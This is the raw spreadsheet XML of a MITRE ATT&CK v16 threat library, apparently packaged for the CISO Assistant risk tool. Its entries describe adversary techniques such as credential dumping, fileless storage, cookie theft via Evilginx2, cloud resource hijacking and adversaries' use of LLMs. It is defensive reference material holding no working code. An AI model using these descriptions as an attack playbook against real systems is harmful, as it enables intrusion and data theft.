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ulianDoloir\Desktop\Repos\intuitem\ciso-assistant-community\tools\excel\mitre\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{9627799A-2C03-429B-B4C6-6AADFE3881FF}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1485" yWindow="-15870" windowWidth="25440" windowHeight="15990" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="library_meta" sheetId="1" r:id="rId1"/>
    <sheet name="Mitre threats_meta" sheetId="2" r:id="rId2"/>
    <sheet name="Mitre threats_content" sheetId="3" r:id="rId3"/>
    <sheet name="Mitre mitigations_meta" sheetId="4" r:id="rId4"/>
    <sheet name="Mitre mitigations_conten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5" l="1"/>
  <c r="G14" i="5"/>
  <c r="G26" i="5"/>
  <c r="G38" i="5"/>
  <c r="G3" i="5"/>
  <c r="G15" i="5"/>
  <c r="G27" i="5"/>
  <c r="G39" i="5"/>
  <c r="G4" i="5"/>
  <c r="G16" i="5"/>
  <c r="G28" i="5"/>
  <c r="G40" i="5"/>
  <c r="G5" i="5"/>
  <c r="G20" i="5"/>
  <c r="G35" i="5"/>
  <c r="G7" i="5"/>
  <c r="G22" i="5"/>
  <c r="G37" i="5"/>
  <c r="G6" i="5"/>
  <c r="G24" i="5"/>
  <c r="G44" i="5"/>
  <c r="G8" i="5"/>
  <c r="G25" i="5"/>
  <c r="G45" i="5"/>
  <c r="G9" i="5"/>
  <c r="G31" i="5"/>
  <c r="G10" i="5"/>
  <c r="G32" i="5"/>
  <c r="G11" i="5"/>
  <c r="G36" i="5"/>
  <c r="G12" i="5"/>
  <c r="G41" i="5"/>
  <c r="G13" i="5"/>
  <c r="G17" i="5"/>
  <c r="G18" i="5"/>
  <c r="G19" i="5"/>
  <c r="G21" i="5"/>
  <c r="G23" i="5"/>
  <c r="G29" i="5"/>
  <c r="G30" i="5"/>
  <c r="G33" i="5"/>
  <c r="G34" i="5"/>
  <c r="G42" i="5"/>
  <c r="G43" i="5"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3338" uniqueCount="3122">
  <si>
    <t>type</t>
  </si>
  <si>
    <t>library</t>
  </si>
  <si>
    <t>urn</t>
  </si>
  <si>
    <t>urn:intuitem:risk:library:mitre-attack</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>locale</t>
  </si>
  <si>
    <t>en</t>
  </si>
  <si>
    <t>ref_id</t>
  </si>
  <si>
    <t>mitre-attack</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK v16 - Threats and mitigations</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>copyright</t>
  </si>
  <si>
    <t>Terms of Use
LICENSE
The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&amp;CK® for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.
"© 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."
DISCLAIMERS
MITRE does not claim ATT&amp;CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&amp;CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&amp;CK.
ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>provider</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK</t>
  </si>
  <si>
    <t>packager</t>
  </si>
  <si>
    <t>intuitem</t>
  </si>
  <si>
    <t>threats</t>
  </si>
  <si>
    <t>base_urn</t>
  </si>
  <si>
    <t>urn:intuitem:risk:threat:mitre-attack</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>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Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)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https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>T1205.002</t>
  </si>
  <si>
    <t>Socket Filters</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</si>
  <si>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
https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>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“disabled by default”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https://attack.mitre.org/techniques/T1047</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>T1027.011</t>
  </si>
  <si>
    <t>Fileless Storage</t>
  </si>
  <si>
    <t>Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock` may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)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Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)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https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019)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
https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</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</si>
  <si>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including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics)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
https://attack.mitre.org/techniques/T1557</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin)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
https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Rundll32</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</si>
  <si>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execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.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https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t>T1583.007</t>
  </si>
  <si>
    <t>Serverless</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure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https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>T1027.009</t>
  </si>
  <si>
    <t>Embedded Payloads</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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</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</si>
  <si>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Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>T1564.012</t>
  </si>
  <si>
    <t>File/Path Exclusions</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)
Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.
https://attack.mitre.org/techniques/T1564/012</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>Linux and Mac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</si>
  <si>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https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix)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https://attack.mitre.org/techniques/T1003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</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</si>
  <si>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
https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Direct Network 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</si>
  <si>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
https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1213/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>T1588.007</t>
  </si>
  <si>
    <t>Artificial Intelligence</t>
  </si>
  <si>
    <t>Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)
https://attack.mitre.org/techniques/T1588/007</t>
  </si>
  <si>
    <t>T1666</t>
  </si>
  <si>
    <t>Modify Cloud Resource Hierarchy</t>
  </si>
  <si>
    <t>Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  
IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)
Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)
In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1666</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>T1027.013</t>
  </si>
  <si>
    <t>Encrypted/Encoded File</t>
  </si>
  <si>
    <t>Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) 
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.
https://attack.mitre.org/techniques/T1027/013</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</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</si>
  <si>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
https://attack.mitre.org/techniques/T1499/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>T1485.001</t>
  </si>
  <si>
    <t>Lifecycle-Triggered Deletion</t>
  </si>
  <si>
    <t>Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.  
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. 
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)
https://attack.mitre.org/techniques/T1485/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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information.(Citation: ESET Attor Oct 2019)
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1543</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</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</si>
  <si>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Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g.,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
https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>T1036.007</t>
  </si>
  <si>
    <t>Double File Extension</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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>T1496.003</t>
  </si>
  <si>
    <t>SMS Pumping</t>
  </si>
  <si>
    <t>Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
https://attack.mitre.org/techniques/T1496/003</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</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</si>
  <si>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
https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1560/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>T1584.008</t>
  </si>
  <si>
    <t>Network Devices</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices.
Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
Compromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)
https://attack.mitre.org/techniques/T1584/008</t>
  </si>
  <si>
    <t>T1583.008</t>
  </si>
  <si>
    <t>Malvertising</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1583/008</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</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</si>
  <si>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
https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses.(Citation: TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries can collect or forward email from mail servers or clients.
https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: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
https://attack.mitre.org/techniques/T1542/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
In addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as well as by leveraging files such as sitemap.xml and robots.txt.(Citation: Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015)
https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</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</si>
  <si>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
https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>T1588.004</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</si>
  <si>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
https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1583/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those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
https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Group Policy Discovery</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</si>
  <si>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or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>T1587.003</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</si>
  <si>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
https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Password Cracking</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</si>
  <si>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
https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1555/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption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</si>
  <si>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
https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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Entra ID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
https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>T1036.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
